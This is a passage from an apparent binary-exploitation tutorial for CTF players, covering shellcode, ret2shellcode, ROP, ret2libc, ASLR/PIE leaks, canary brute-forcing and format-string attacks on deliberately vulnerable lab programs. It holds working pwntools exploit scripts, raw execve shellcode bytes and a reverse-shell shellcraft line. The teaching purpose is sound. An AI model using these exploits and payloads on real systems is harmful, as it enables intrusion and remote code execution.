payload = b"A"*72 + rop.chain()
process(exe.path).sendline(payload)
This is the level of automation you'll use 90% of the time. Building chains by hand is for understanding; ROP() is for shipping exploits.
11 // Shellcode 101
Shellcode is a small chunk of machine code that, when executed, does something useful — usually spawning a shell with execve("/bin/sh", NULL, NULL). Before we use it (next chapter), let's understand what's inside it.
The Goal: execve("/bin/sh", NULL, NULL)
On Linux x86-64, this is syscall #59 (SYS_execve). To invoke it from assembly:
| Register | Value |
|---|---|
| RAX | 59 (syscall number) |
| RDI | pointer to "/bin/sh" |
| RSI | 0 (no argv) |
| RDX | 0 (no envp) |
Then execute the syscall instruction. Done.
The Naive Version
section .text
global _start
_start:
mov rax, 0x68732f6e69622f ; "/bin/sh\0" (8 bytes)
push rax
mov rdi, rsp ; rdi = pointer to "/bin/sh"
mov rax, 59
mov rsi, 0
mov rdx, 0
syscall
The Bad-Char Problem
If your shellcode is delivered via a function like strcpy or scanf("%s"), any null byte (0x00) in the shellcode will truncate the string and break it.
The naive version above has tons of null bytes. mov rsi, 0 assembles to 48 c7 c6 00 00 00 00 — four nulls. Won't work.
The Trick: XOR for Zero
xor reg, reg sets a register to zero with no nulls in the encoding:
xor rsi, rsi ; encodes as: 48 31 f6 (no nulls)
The Clean Version
section .text
global _start
_start:
xor rax, rax
mov rbx, 0x68732f2f6e69622f ; "/bin//sh" — note doubled slash
push rax ; null terminator
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov al, 59 ; al = lower byte of rax. avoids nulls.
syscall
Why "/bin//sh" (doubled slash) instead of "/bin/sh\0"? Because /bin//sh is exactly 8 bytes and execve treats double-slash as single — same result, no awkward null in the middle.
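You can see the difference between the two strings by packing them the way the mov immediate would carry them. A small sketch using only the standard library; `as_imm64` is a helper name made up here.

```python
import struct

def as_imm64(s: bytes) -> int:
    """Interpret up to 8 bytes as the little-endian immediate of a 'mov reg, imm64'."""
    return struct.unpack("<Q", s.ljust(8, b"\x00"))[0]

for s in (b"/bin/sh", b"/bin//sh"):
    imm = as_imm64(s)
    encoded = struct.pack("<Q", imm)          # the 8 bytes that end up in the instruction
    verdict = "contains a null" if b"\x00" in encoded else "null-free"
    print(s, hex(imm), verdict)
```

The 7-byte string has to be padded to fill the register, and that padding byte is exactly the null you were trying to avoid.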
Assemble and Test
$ nasm -f elf64 shellcode.asm -o shellcode.o
$ ld shellcode.o -o shellcode
$ ./shellcode
$ id
uid=1000(user) ...
Extract the Bytes
$ objdump -d shellcode -M intel | grep -E "^ +[0-9a-f]+:" | awk -F$'\t' '{print $2}' | tr -d ' \n'
4831c048bb2f62696e2f2f736850534889e74831f64831d2b03b0f05
That hex is your shellcode. As a Python bytestring:
shellcode = b"\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05"
The Lazy Way: pwntools.shellcraft
You don't have to write shellcode by hand. Pwntools generates clean, null-free shellcode for you:
from pwn import *
context.arch = "amd64"
shellcode = asm(shellcraft.sh())
print(shellcode)
print(len(shellcode), "bytes")
Or for 32-bit:
context.arch = "i386"
shellcode = asm(shellcraft.sh())
The msfvenom Way
Metasploit's msfvenom generates shellcode for many platforms:
msfvenom -p linux/x64/exec CMD="/bin/sh" -f python -b "\x00"
The -b "\x00" tells it to avoid null bytes.
Common Shellcode Tasks
| Goal | Pwntools shortcut |
|---|---|
| Spawn /bin/sh | shellcraft.sh() |
| Read flag.txt to stdout | shellcraft.cat("flag.txt") |
| Exit cleanly | shellcraft.exit(0) |
| Reverse shell | shellcraft.connect("1.2.3.4", 1337) + shellcraft.dupsh() |
NOP Sleds
When you can't predict the exact landing address, prepend NOPs (0x90 on x86):
payload = b"\x90"*200 + shellcode
Land anywhere in the NOP sled and you'll slide down to your shellcode. Not strictly necessary if your address is exact, but useful for stack-shellcode-with-jitter scenarios.
12 // Ret2Shellcode
Combine the last two chapters: inject shellcode into the buffer, then jump to it. This is the original buffer overflow exploit from the 1990s. It only works when NX is off — but every modern CTF will have a "warmup" challenge that uses it.
Requirements
- Buffer big enough to hold shellcode (~30 bytes minimum).
- NX disabled (stack is executable).
- Known stack address (or ASLR off, or a leak).
The Vulnerable Program
#include <stdio.h>
void vuln() {
char buf[200]; // big enough for shellcode
printf("Buffer at: %p\n", buf); // gives us the address!
gets(buf);
}
int main() { vuln(); return 0; }
gcc -fno-stack-protector -no-pie -z execstack -o ret2sc ret2sc.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
The Plan
The shellcode goes at the start of the buffer. Padding fills the rest. Then we put the address of buf as the new RIP. When ret fires, RIP becomes the address of our shellcode, and execution flows right into it.
Step 1: Find Offset
$ gdb -q ./ret2sc
pwndbg> run < <(cyclic 300)
RIP 0x6361616663616165
pwndbg> cyclic -l 0x6361616663616165
216
Buffer is 200 bytes, plus 8 bytes saved RBP = 208. But offset is 216? That's compiler padding for 16-byte alignment. Always trust cyclic, never trust your math.
Step 2: Build the Exploit
from pwn import *
context.binary = exe = ELF("./ret2sc")
context.arch = "amd64"
p = process(exe.path)
# Read the leaked buffer address from the program's output
p.recvuntil(b"Buffer at: ")
buf_addr = int(p.recvline().strip(), 16)
log.success("buf @ " + hex(buf_addr))
shellcode = asm(shellcraft.sh())
payload = shellcode
payload += b"A" * (216 - len(shellcode))
payload += p64(buf_addr) # jump back to start of buf
p.sendline(payload)
p.interactive()
$ python3 solve.py
[+] buf @ 0x7fffffffe2a0
$ id
uid=1000(user) ...
Without an Address Leak (ASLR off)
If the program doesn't print the buffer address, you have to find it in GDB and hope it's stable:
pwndbg> break *vuln+25
pwndbg> run
<<< type something >>>
pwndbg> x/s $rsp
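0x7fffffffe2a0: "AAAA..."
That address (with ASLR off) will be the same on subsequent runs under GDB. Outside GDB the environment is slightly different, which can shift the stack by a few dozen bytes, so treat the value as a close guess. Hardcode it.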
Add a NOP Sled for Safety
If your guessed address might be a few bytes off, prepend NOPs:
payload = b"\x90" * 100 # NOP sled — land anywhere here
payload += shellcode
payload += b"A" * (216 - len(payload))
payload += p64(buf_addr + 50) # aim for middle of sled
Why This Doesn't Work in Real Life
Two things kill ret2shellcode:
- NX — the stack isn't executable, so even jumping to your shellcode just causes a SIGSEGV.
- ASLR — without a leak, you don't know where the stack is.
Both are on by default on every modern Linux. So in practice, you'll do ROP/ret2libc instead. But if you ever see checksec say "NX disabled" — go straight to ret2shellcode. Easiest exploit there is.
13 // ROP — Return-Oriented Programming
NX makes shellcode injection useless. The fix: don't bring your own code — reuse the code that's already in the binary. Chain together small snippets called gadgets, each ending in ret, to build any computation you want.
What is a Gadget?
A gadget is 1-5 instructions ending in ret. The most useful ones are extremely short:
| Gadget | Effect |
|---|---|
| pop rdi ; ret | Sets RDI from stack |
| pop rsi ; ret | Sets RSI from stack |
| pop rdx ; ret | Sets RDX from stack |
| pop rax ; ret | Sets RAX (syscall number) |
| syscall ; ret | Triggers a syscall |
| ret | Stack alignment / no-op |
| mov [rdi], rsi ; ret | Arbitrary write |
How a ROP Chain Executes
The CPU's ret instruction pops 8 bytes off the stack into RIP and jumps. So if you stack a series of gadget addresses, each one runs and then rets into the next:
It's like a Rube Goldberg machine. Each ret kicks off the next gadget.
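The ret-driven control flow can be modelled in a few lines of plain Python. This is a toy simulator, not an emulator: the gadget table is hypothetical (the `pop rsi` address 0x401335 in particular is invented), and each gadget is reduced to the list of registers it pops before its final ret.

```python
import struct


def p64(value):
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


# Hypothetical gadget table: address -> registers popped before the final 'ret'
GADGETS = {
    0x401333: ["rdi"],   # pop rdi ; ret
    0x401335: ["rsi"],   # pop rsi ; ret  (invented address)
    0x40101a: [],        # ret
}


def run_chain(chain, gadgets):
    """Walk a packed chain the way successive 'ret' instructions would."""
    words = list(struct.unpack(f"<{len(chain) // 8}Q", chain))
    regs, trace, sp = {}, [], 0
    while sp < len(words):
        rip = words[sp]          # ret: pop 8 bytes off the stack into RIP
        sp += 1
        trace.append(rip)
        if rip not in gadgets:
            break                # left the gadget table, e.g. entered a real function
        for reg in gadgets[rip]:
            regs[reg] = words[sp]   # pop <reg>: consume the next stack word
            sp += 1
    return regs, trace


chain = (p64(0x401333) + p64(0x402008)    # rdi = 0x402008
         + p64(0x401335) + p64(0)         # rsi = 0
         + p64(0x40101a)                  # alignment ret
         + p64(0x401030))                 # final target, e.g. a PLT stub

regs, trace = run_chain(chain, GADGETS)
print({r: hex(v) for r, v in regs.items()})  # {'rdi': '0x402008', 'rsi': '0x0'}
print([hex(a) for a in trace])               # ['0x401333', '0x401335', '0x40101a', '0x401030']
```

The stack pointer only ever moves forward through the chain: addresses are consumed by ret, data words by pop.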
Finding Gadgets
Two tools, same job:
# Ropper
$ ropper --file ./vuln --search "pop rdi"
0x0000000000401333: pop rdi; ret;
0x0000000000401412: pop rdi; pop rbp; ret;
# ROPgadget
$ ROPgadget --binary ./vuln | grep "pop rdi"
0x0000000000401333 : pop rdi ; ret
Pwntools finds them in Python:
>>> e = ELF('./vuln')
>>> rop = ROP(e)
>>> rop.find_gadget(['pop rdi', 'ret'])
Gadget(0x401333, ['pop rdi', 'ret'], ['rdi'], 0x10)
Build a Chain Manually
Goal: call puts("flag.txt"), which is basically an arbitrary function call with one argument. We need RDI = pointer to a string.
from pwn import *
exe = ELF("./vuln")
# Find a string in the binary or write one to .bss
flag_str = next(exe.search(b"flag.txt\x00"))
pop_rdi = 0x401333
puts = exe.plt["puts"]
ret = 0x40101a # a single 'ret' for stack alignment
chain = p64(pop_rdi)
chain += p64(flag_str)
chain += p64(ret) # align stack
chain += p64(puts)
payload = b"A"*72 + chain
Build a Chain with pwntools (the easy way)
from pwn import *
exe = ELF("./vuln")
rop = ROP(exe)
rop.puts(next(exe.search(b"flag.txt")))
print(rop.dump()) # pretty-print the chain
payload = b"A"*72 + rop.chain()
Output of rop.dump() looks like:
0x0000: 0x401333 pop rdi; ret
0x0008: 0x402008 [arg0] rdi = 4202504
0x0010: 0x401030 puts
Multi-Step Chains
Chain functions: read flag, then exit cleanly:
rop.open(filename, 0) # open(flag.txt, O_RDONLY)
rop.read(3, buf, 100) # read 100 bytes from fd 3 to buf
rop.write(1, buf, 100) # write to stdout
rop.exit(0) # clean exit
Pwntools sets up RDI, RSI, and RDX for each call, provided it can find the gadgets it needs in the binaries you gave it. This is a real ROP chain you'd write for a CTF.
The Stack Pivot Concept
Sometimes the buffer is too small for a long ROP chain. Solution: write the chain to a different location (.bss, heap, etc.) and pivot RSP there.
Pivot gadgets:
| Gadget | Effect |
|---|---|
| leave ; ret | rsp = rbp, then ret. Use with controlled RBP. |
| add rsp, X ; ret | Skip X bytes on stack |
| xchg eax, esp | Pivot stack to whatever's in EAX |
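A toy model can make the `leave ; ret` pivot concrete. This is a sketch under stated assumptions: memory is a plain dict, the fake stack address 0x404800 is a hypothetical spot in .bss, and the register values are invented. It only shows where RSP and RIP end up once RBP is attacker-controlled.

```python
def leave_ret(mem, regs):
    """Apply the effect of `leave ; ret` to a toy register/memory model."""
    regs = dict(regs)
    regs["rsp"] = regs["rbp"]          # leave, part 1: mov rsp, rbp
    regs["rbp"] = mem[regs["rsp"]]     # leave, part 2: pop rbp
    regs["rsp"] += 8
    regs["rip"] = mem[regs["rsp"]]     # ret: pop rip
    regs["rsp"] += 8
    return regs


FAKE_STACK = 0x404800                  # hypothetical address inside .bss
mem = {
    FAKE_STACK: 0x4242424242424242,    # becomes the new RBP (junk is fine)
    FAKE_STACK + 8: 0x401333,          # first gadget of the second-stage chain
    FAKE_STACK + 16: 0x402008,         # value that gadget will pop
}

before = {"rsp": 0x7fffffffe2f0, "rbp": FAKE_STACK, "rip": 0x401200}
after = leave_ret(mem, before)
print(hex(after["rip"]), hex(after["rsp"]))  # 0x401333 0x404810
```

Note the layout this implies: the first 8 bytes at the pivot target are consumed as the new RBP, so the second-stage chain starts 8 bytes in.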
4 // Ret2libc / Ret2system
The binary doesn't have a win() function for you to jump to — but every binary that uses C imports libc, which has system and the string "/bin/sh" already loaded in memory. Use those.
What's Inside libc
libc is a shared library (libc.so.6) loaded at runtime by every dynamically-linked C program. It contains:
- Functions: printf, puts, system, execve, read, write, etc.
- Strings: "/bin/sh" appears as a literal in libc itself.
- "One gadgets": magic addresses where calling them = instant shell.
The Setup (ASLR off, for now)
#include <stdio.h>
void vuln() { char buf[64]; gets(buf); }
int main() { vuln(); return 0; }
gcc -fno-stack-protector -no-pie -o ret2libc ret2libc.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Find the Pieces
# 1. system address in libc
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " system@"
1481: 0000000000050d70 45 FUNC WEAK DEFAULT 17 system@@GLIBC_2.2.5
# 2. /bin/sh string in libc
$ strings -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
1d8678 /bin/sh
# 3. libc base address (with ASLR off it's stable)
$ ldd ./ret2libc
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000)
Real addresses: system = libc_base + 0x50d70, "/bin/sh" = libc_base + 0x1d8678.
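The arithmetic is worth doing once by hand. The sketch below uses only the standard library; the base and offsets are the ones from the command output above, while the two gadget addresses are assumptions carried over from the earlier ROP examples. It also checks the payload for newline bytes, since gets() stops reading at 0x0a.

```python
import struct

LIBC_BASE = 0x00007ffff7c00000   # from ldd; only stable with ASLR off
SYSTEM_OFFSET = 0x50d70          # from readelf
BINSH_OFFSET = 0x1d8678          # from strings -t x
POP_RDI = 0x401333               # assumed gadget address in the binary
RET = 0x40101a                   # assumed single-ret gadget


def p64(value):
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


system = LIBC_BASE + SYSTEM_OFFSET
binsh = LIBC_BASE + BINSH_OFFSET

payload = b"A" * 72 + p64(POP_RDI) + p64(binsh) + p64(RET) + p64(system)

# gets() stops at a newline, so a 0x0a byte anywhere would truncate the payload
bad_positions = [i for i, byte in enumerate(payload) if byte == 0x0a]

print(hex(system))      # 0x7ffff7c50d70
print(hex(binsh))       # 0x7ffff7dd8678
print(bad_positions)    # []
```

If `bad_positions` is ever non-empty, pick a different gadget or a different copy of the string, because everything after that byte never reaches the stack.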
The Exploit (manual)
from pwn import *
exe = ELF("./ret2libc")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = process(exe.path)
libc.address = 0x00007ffff7c00000 # with ASLR off
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh"))
pop_rdi = 0x401333 # in the binary
ret = 0x40101a # stack alignment
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret) # align stack to 16 bytes
payload += p64(system)
p.sendline(payload)
p.interactive()
The Exploit (pwntools)
from pwn import *
exe = ELF("./ret2libc")
libc = exe.libc # auto-detect
libc.address = 0x7ffff7c00000
p = process(exe.path)
rop = ROP([exe, libc])
rop.system(next(libc.search(b"/bin/sh")))
p.sendline(b"A"*72 + rop.chain())
p.interactive()
One Gadgets: The Magic Shortcut
Inside libc, there are several addresses where, if RIP lands there with certain register conditions met, you instantly get a shell. They're called one gadgets:
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xebc81 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xebc85 execve("/bin/sh", r15, rdx)
constraints:
...
0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
...
If the constraints are satisfied at the moment you jump there, no setup needed:
payload = b"A" * 72
payload += p64(libc_base + 0xebc81) # one gadget. shell.
Sometimes none of the gadgets' constraints fit your situation. Then you fall back to system("/bin/sh"). But always try one_gadget first: it's a 1-line exploit when it works.
The Real Workflow (with ASLR)
You won't have ASLR off in CTF. The realistic ret2libc flow takes four steps:
- Leak a libc address (next chapter shows how).
- Subtract a known offset → libc base.
- Compute system and "/bin/sh" addresses.
- Re-trigger the BOF and send the real exploit.
That's a 2-stage exploit: one overflow to leak, a second one to get the shell. Read on.
5 // Bypassing PIE & ASLR with Leaks
The whole game changes when you can't hardcode addresses. PIE randomizes the binary base. ASLR randomizes libc, stack, and heap. The fix is the same in both cases: leak one address, derive everything else.
The Magic of Offsets
Addresses are random per-run, but offsets between addresses inside the same module are constant. If you leak one libc address, you know all of libc.
So: leak puts address → subtract libc.symbols['puts'] → that's libc base → add libc.symbols['system'] → real system address.
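As a worked instance of that arithmetic, here is a small standard-library sketch. Both offsets are hypothetical stand-ins for what `libc.symbols[...]` would return for your libc, and the leaked value is just an example address. The page-alignment check is a cheap sanity test: a libc base that does not end in 000 almost always means the wrong libc or a bad leak.

```python
PAGE_MASK = 0xfff
PUTS_OFFSET = 0x46420     # hypothetical: libc.symbols['puts'] for some libc
SYSTEM_OFFSET = 0x50d70   # hypothetical: libc.symbols['system'] for the same libc


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Turn one leaked symbol address into the module base."""
    base = leaked_addr - symbol_offset
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong libc or bad leak?")
    return base


leaked_puts = 0x7f9e1a3b9420          # example leak for this run
base = libc_base_from_leak(leaked_puts, PUTS_OFFSET)
system = base + SYSTEM_OFFSET

print(hex(base))     # 0x7f9e1a373000
print(hex(system))   # 0x7f9e1a3c3d70
```

The same function works for the binary base under PIE: pass a leaked binary address and that symbol's offset instead.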
The PUTS Leak Technique
The standard trick: use the BOF to call puts(puts@got). puts prints a string, and the GOT entry for puts contains puts's real libc address. So puts(puts@got) prints out its own location in libc.
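One detail trips people up: puts stops at the first null byte, so a 64-bit libc address arrives as only six bytes plus a newline. A minimal sketch of the parsing step, using only the standard library (the function name `parse_puts_leak` and the sample bytes are illustrative):

```python
def parse_puts_leak(line):
    """Convert the raw bytes printed by puts(<GOT entry>) into an integer."""
    raw = line[:-1] if line.endswith(b"\n") else line   # drop the newline puts appends
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    # puts stopped at the first null, so restore the missing high zero bytes
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


line = b"\x20\x94\x3b\x1a\x9e\x7f\n"    # sample: six address bytes plus newline
print(hex(parse_puts_leak(line)))       # 0x7f9e1a3b9420
```

Removing exactly one trailing newline is slightly safer than a blanket strip(), which would also eat whitespace-valued bytes that belong to the address.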
The Vulnerable Program
#include <stdio.h>
void vuln() {
char buf[64];
gets(buf);
}
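int main() {
while (1) { // loop so we can BOF twice
vuln();
puts("ok"); // importing puts gives the binary the puts@plt / puts@got entries the exploit uses
}
return 0;
}
gcc -fno-stack-protector -no-pie -o leak leak_libc.c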
# ASLR ON for this one — that's the whole point
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
Stage 1: Leak puts's libc address
from pwn import *
exe = ELF("./leak")
libc = exe.libc
p = process(exe.path)
pop_rdi = 0x401333
ret = 0x40101a
puts_plt = exe.plt["puts"]
puts_got = exe.got["puts"]
main = exe.symbols["main"]
# Stage 1: call puts(puts@got) — leak libc — return to main
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(puts_got) # RDI = puts's GOT entry
payload += p64(puts_plt) # puts(puts_got) → prints libc address
payload += p64(main) # return to main → loop again for stage 2
p.sendline(payload)
# Read leaked address
leaked = p.recvline().strip().ljust(8, b"\x00")
puts_libc = u64(leaked)
log.success("puts @ " + hex(puts_libc))
libc.address = puts_libc - libc.symbols["puts"]
log.success("libc base @ " + hex(libc.address))
Stage 2: Use it to call system("/bin/sh")
# continued in same script...
# Stage 2: ret2libc with leaked libc base
binsh = next(libc.search(b"/bin/sh\x00"))
system = libc.symbols["system"]
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret) # 16-byte align
payload += p64(system)
p.sendline(payload)
p.interactive()
$ python3 solve.py
[+] puts @ 0x7f9e1a3b9420
[+] libc base @ 0x7f9e1a373000
$ id
uid=1000(user) ...
Bypassing PIE
Same idea, different target. With PIE on, even main's address is random. To leak it, you can use a format string bug, or leak any address from the binary that ends up on the stack, or an info-leak vuln.
Once you have any one address in the binary, subtract its symbol offset to get the binary base:
leaked_main = 0x55a3d8001234 # leaked somehow
exe.address = leaked_main - exe.symbols["main"]
log.success("binary base @ " + hex(exe.address))
# Now any binary symbol's real address:
real_win = exe.symbols["win"] # auto-uses exe.address
Common Leak Sources
| Source | What you can leak |
|---|---|
| Format string (%p) | Stack values → libc / canary / saved RBP / saved RIP |
| puts on a GOT entry | That function's libc address |
| printf("%s", ptr) with controlled ptr | Any null-terminated string in memory |
| Heap UAF | Heap pointers → heap base |
| Out-of-bounds read | Anything adjacent to your buffer |
The Pwntools Pattern (memorize)
# Stage 1 boilerplate for any libc leak via puts:
rop = ROP(exe)
rop.puts(exe.got["puts"])
rop.main() # or whatever returns to a vuln
p.sendline(b"A"*72 + rop.chain())
leaked = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leaked - libc.symbols["puts"]
This pattern shows up in a large share of CTF pwn writeups. Burn it into memory.
6 // Stack Canary Bypass
The stack canary is a random 8-byte cookie that sits between local variables and the saved registers. If your overflow touches it, the program calls __stack_chk_fail and dies. To bypass it: read it first, then include the correct value in your payload.
What a Canary Looks Like in Assembly
vuln:
push rbp
mov rbp, rsp
sub rsp, 0x50
mov rax, qword ptr fs:[0x28] ; load canary from TLS
mov qword ptr [rbp - 8], rax ; store on stack
xor eax, eax
... ; function body
mov rax, qword ptr [rbp - 8] ; reload canary
sub rax, qword ptr fs:[0x28] ; should be zero
jne __stack_chk_fail ; if not, abort
leave
ret
If you see fs:[0x28] in any function, that function has a canary.
Stack Layout with Canary
An overflow that overwrites RIP must also overwrite the canary at offset 64. So we need to write the correct canary back.
Bypass Method 1: Leak via Format String
If the binary has a format string vulnerability, you can read stack values:
$ ./vuln
Name: AAAA-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello, AAAA-7ffefb812340-0-1-7ffefb812478-7d3a8c9b1500-d3f4a2b800000000-...
↑
that's the canary
(always ends in 00: that's the null byte at the bottom)
Bypass Method 2: Brute-Force on Forking Servers
If the program fork()s a new process for each connection, each child inherits the parent's canary. The canary is only re-randomized when the parent restarts. So you can:
- Connect, send N bytes that overwrite only the first canary byte.
- If the program crashes (server resets connection) → wrong byte. Try the next value.
- If the program continues → that byte is correct. Move to byte 2.
That's 256 × 8 = 2048 attempts max for a full canary leak. Trivial over fast loopback. The first byte of a Linux canary is always 0x00 (it's a security choice — prevents string functions from leaking it), so you actually only need to brute-force 7 bytes.
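The byte-at-a-time logic can be tried offline before pointing it at a server. In this sketch the forking server is replaced by a hypothetical in-process oracle (`make_oracle`) that answers "did the child survive?" for a guessed canary prefix. Only the search strategy is real; the oracle is a stand-in.

```python
import os


def make_oracle(secret):
    """Stand-in for the forking server: True if the child would survive."""
    def survives(prefix):
        # The child survives only if every overwritten canary byte is correct
        return secret.startswith(prefix)
    return survives


def brute_force_canary(survives):
    """Recover an 8-byte canary one byte at a time."""
    known = b"\x00"                      # lowest byte is always 0x00
    attempts = 0
    for _ in range(7):
        for guess in range(256):
            attempts += 1
            if survives(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte matched; the crash oracle is unreliable")
    return known, attempts


secret = b"\x00" + os.urandom(7)         # random canary for this simulated run
canary, attempts = brute_force_canary(make_oracle(secret))
print(canary == secret)                  # True
print(attempts <= 7 * 256)               # True
```

Guessing all eight bytes at once would need up to 2^64 tries. Because each byte is confirmed independently, the worst case here is 7 × 256 = 1792.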
Brute-Force Script Template
from pwn import *
context.log_level = "warning"
def guess(known, byte):
    p = remote("localhost", 1337)
    payload = b"A"*64 + known + p8(byte)
    # send(), not sendline(): assumes the server reads with read()/recv();
    # a trailing newline would overwrite the next canary byte
    p.send(payload)
    try:
        resp = p.recvall(timeout=1)
        return b"stack smashing" not in resp
    except EOFError:
        return False
    finally:
        p.close()
canary = b"\x00" # first byte always 0x00
for pos in range(7):
    for b in range(256):
        if guess(canary, b):
            canary += p8(b)
            log.success(f"byte {pos+1}: {b:02x}")
            break
    else:
        raise SystemExit(f"no match for byte {pos+1}; check the crash detection")
print("canary:", hex(u64(canary)))
Putting It Together
Once you have the canary, your payload becomes:
payload = b"A" * 64 # fill buffer
payload += canary # preserve canary
payload += b"B" * 8 # saved RBP (anything)
payload += p64(rip_target) # overwrite RIP
Bypass Method 3: Skip the Canary
Sometimes you don't need to defeat the canary at all. If you find a different bug — heap UAF, format string write, anything that lets you redirect execution without going through the function epilogue — the canary check never fires.
7 // Format String Vulnerabilities
The most underrated bug in binary exploitation. A single misuse of printf can give you arbitrary read AND arbitrary write — the most powerful primitive in pwn. Format strings can leak canaries, defeat PIE, and overwrite the GOT to get RCE — all without touching the stack.
The Bug
// VULNERABLE
printf(user_input); // user controls the format string
// SAFE
printf("%s", user_input); // format string is hardcoded
When the format string contains % specifiers, printf reads its arguments from registers (RSI, RDX, RCX, R8, R9 on 64-bit) and then from the stack. If you control the format string, you control which memory gets read.
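The register-then-stack order can be written down as a tiny lookup. This sketch assumes the x86-64 System V calling convention, where RDI holds the format string itself; `printf_arg_location` is a made-up helper name, and the stack offsets are relative to RSP just before the call instruction.

```python
ARG_REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]   # rdi holds the format string


def printf_arg_location(n):
    """Where printf fetches its n-th variadic argument (1-based) on x86-64 SysV."""
    if n < 1:
        raise ValueError("positional arguments start at 1")
    if n <= len(ARG_REGISTERS):
        return ARG_REGISTERS[n - 1]
    # From the 6th argument on, values come from the caller's stack, 8 bytes each
    return f"[rsp+{8 * (n - 6):#x}]"


for n in (1, 5, 6, 7):
    print(n, printf_arg_location(n))
# 1 rsi
# 5 r9
# 6 [rsp+0x0]
# 7 [rsp+0x8]
```

This is why offsets of 6 or more keep showing up in format string exploits: the first five positions are registers you rarely control, and your buffer lives somewhere in the stack slots after them.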
Quick Confirmation
$ ./vuln
Name: %x %x %x %x
Hello, 7fffffff aaaabaaa cccdcccd... # stack values leak!
If your input prints garbage hex when you include format specifiers, you have a format string bug. Confirmed.
Format Specifier Reference
| Specifier | Effect |
|---|---|
| %x | Read 4 bytes as hex |
| %lx | Read 8 bytes as hex (64-bit) |
| %p | Read pointer-sized value |
| %s | Treat arg as pointer, print null-terminated string at that address — arbitrary read |
| %n | Treat arg as pointer, write the count of chars-printed-so-far to that address — arbitrary write |
| %N$x | "Direct argument access" — read the Nth argument directly. Critical. |
Direct Parameter Access
You don't have to print 50 %xs to reach the 50th value. Use %N$x:
$ ./vuln
Name: AAAAAAAA%7$lx
Hello, AAAAAAAA4141414141414141 # 7th printf argument is "AAAAAAAA"
That tells you your input string starts at the 7th printf argument position in this binary. Useful number.
Find Your Offset Once
Spam %N$p for N=1..20 and look for your "AAAAAAAA":
>>> for n in range(1, 21):
...     p.sendline(f"AAAAAAAA %{n}$p".encode())
...     print(n, p.recvline())
1 0x7ffefb...
2 (nil)
...
6 0x4141414141414141 # your input is at position 6
Arbitrary Read
To read memory at address X, put X on the stack (as part of your input) and use %s:
payload = b"%7$sAAAA" # 8 bytes of format string: fills argument 6
payload += p64(0x404010) # target address: lands in argument 7
p.sendline(payload)
leak = p.recvline()
Caveat: printf stops at the first null byte in the format string, and a packed 64-bit address like this one ends in null bytes. So the address has to come after the format specifiers, as it does here, with the argument index adjusted to match.
Arbitrary Write with %n
%n writes the number of characters printed so far to the address pointed to by its argument. With width specifiers, you can control that count:
# Write the value 100 to address 0x404020 (input at offset 6):
payload = b"%100c%8$n".ljust(16, b"A") # print exactly 100 chars, then write that count; padded to fill arguments 6 and 7
payload += p64(0x404020) # address lands in argument 8, after the specifiers
To write large values, use %hn (write 2 bytes at a time):
# Write 0xdeadbeef to addr — 2 writes of 2 bytes each
# write 0xbeef to addr+0 (low half)
# write 0xdead to addr+2 (high half)
Pwntools Helper
Pwntools has fmtstr_payload — give it the offset and a dict of {address: value} writes, and it builds the format string for you:
from pwn import *
context.arch = "amd64" # fmtstr_payload packs addresses using the context's word size
# write 0xdeadbeef to 0x404020, assuming our input is at offset 6
payload = fmtstr_payload(6, {0x404020: 0xdeadbeef})
p.sendline(payload)
Pwntools handles the width math, the byte ordering, the offset adjustment as the format string itself grows. Use this. Manually building %n chains is a recipe for off-by-one suffering.
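For intuition about the width math being automated, here is a sketch of the planning step for %hn writes in plain Python. It only computes how many extra characters must be printed before each 2-byte write; it does not build the final format string. The function name `hn_plan` is made up for this illustration.

```python
def hn_plan(addr, value, halves=2):
    """Plan %hn writes: list of (extra chars to print, address to write)."""
    writes = [((value >> (16 * i)) & 0xffff, addr + 2 * i) for i in range(halves)]
    writes.sort()                     # the printed count only grows, so go smallest first
    plan, printed = [], 0
    for target, where in writes:
        pad = (target - printed) % 0x10000   # %hn keeps only the low 16 bits of the count
        plan.append((pad, where))
        printed += pad
    return plan


for pad, where in hn_plan(0x404020, 0xdeadbeef):
    print(pad, hex(where))
# 48879 0x404020
# 8126 0x404022
```

The second width is 8126 and not 57005 because the count is cumulative: 48879 characters are already out when the second write happens. A pad of 0 needs special handling in a real payload, since a width specifier still prints at least one character.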
8 // GOT Overwrite via Format String
The Global Offset Table (GOT) is a section of memory containing function pointers for every dynamically-linked library function the binary uses. Overwrite one of those pointers, and the next time the program calls that function, it jumps wherever you want.
How Dynamic Linking Works
When your binary calls puts(), it doesn't actually call libc directly. The compiler emits a call to puts@plt — a tiny stub in the binary's PLT (Procedure Linkage Table). The first time the stub runs, it asks the dynamic linker to resolve puts's real libc address and writes that into the corresponding GOT entry. After that, the PLT stub just jumps through the GOT directly.
